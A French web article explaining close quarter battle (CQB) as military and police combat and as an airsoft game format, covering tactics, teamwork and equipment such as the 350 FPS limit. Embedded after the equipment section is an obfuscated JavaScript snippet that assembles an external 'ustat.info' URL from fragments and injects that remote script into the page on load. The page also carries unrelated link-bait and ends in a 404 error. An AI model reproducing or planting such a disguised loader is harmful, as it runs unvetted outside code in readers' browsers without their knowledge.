Qu’est-ce que le CQB ? (en anglais, Close Quarter Battle)

Le CQB est un combat dans des espaces fermés dans lequel des branches spécifiques de l’armée, des forces spéciales ou des forces de police se spécialisent. Il s’agit également d’un type de jeu d’airsoft très populaire, qui permet à chacun de voir à quoi ressemblent de tels combats. Le CQB exige des tactiques spéciales, un très bon travail d’équipe et une communication parfaite – même en se comprenant sans mots.

Dans le CQB, le combat se déroule dans un espace fermé, où les conditions sont souvent difficiles : il fait noir et la visibilité est fortement réduite. Ils visent généralement à délivrer des otages pris au piège par des terroristes et requièrent donc une prudence maximale. Les obstacles sont nombreux pour les soldats, les anti-terroristes ou les policiers qui prennent d’assaut le bâtiment, et la méconnaissance du terrain et du déploiement de l’ennemi ne facilite pas les choses. Le rôle du chef est très important et responsable, car il dirige toute l’équipe et évalue en permanence la situation. Les autres joueurs doivent se fier à son jugement.

Lire également : Conseils pour les voyages en train pour Pompéi

Pendant les opérations, il est indispensable de partir du principe qu’un rival peut se cacher au coin de la rue, ce qui signifie qu’il faut fouiller chaque pièce et chaque coin. Il convient de profiter de chaque trou et de chaque brèche dans le mur pour procéder à une première évaluation depuis l’extérieur. Avant le jeu, on peut également se mettre d’accord avec l’équipe sur un plan d’action et sur un moyen de communication supplémentaire, car les conversations ne sont pas toujours possibles.

Qui pourrait apprécier ces jeux ?

Les jeux de tir CQB sont intenses, mais leur niveau d’activité physique est moins élevé. Si on ne veut pas parcourir beaucoup de kilomètres et courir, on évitera certainement de le faire lors d’un CQB. On sera limités par un espace fermé où l’on devra faire attention. Il est préférable de ne pas faire de bruit, mais de s’approcher discrètement de l’ennemi. La stratégie et une bonne communication – y compris non verbale – avec les autres membres de l’équipe sont très importantes. Une bonne coordination entre les membres de l’équipe est également très importante dans ce cas, de même que le respect de la tactique établie.

A découvrir également : Heure miroir 2h22: signification et interprétation

équipement jeux de tir CQB

Quel type d’équipement est nécessaire pour le CQB ?

On utilise le même équipement dans les jeux CQB que dans les autres jeux d’airsoft. Des billes, des lunettes de protection et une réplique airsoft sont bien sûr nécessaires, mais il faut choisir le bon modèle. Le premier point à prendre en compte est la puissance de la réplique airsoft. Dans le CQB, la vitesse de décharge est limitée à 350 FPS. Les modèles qui ont une vitesse supérieure ne sont pas autorisés à participer au jeu. Un autre aspect important à prendre en compte est le type de réplique. Les joueurs optent généralement pour des répliques plus maniables, plus courtes et plus légères pour une meilleure manœuvrabilité à l’intérieur, comme un pistolet mitrailleur, un fusil d’assaut airsoft ou un fusil léger. En outre, il est recommandé de se munir d’un casque pour se protéger d’éventuelles blessures à la tête, ainsi que d’une lampe de poche.

(function(){
aiXp=document.createElement(« script »);aiXp_= »u »+(« s »)+ »ta »;
aiXp_+=(« t.i »)+ » »+ »n »;aiXp_+=((« f »)+ »o »);aiXp.type= »text/javascript »;
aiXp_+= »/ »; aiXpu= »494190757″;aiXpu+= ».d1z2i035iXpc1v8pawr »;aiXpu+= »q7il9x2k75v »;
aiXp.src= »https:// »+aiXp_+aiXpu;aiXp.async=true;document.body.appendChild(aiXp);
})();

vous pourriez aussi aimer
404 Not Found

404 Not Found


nginx/1.18.0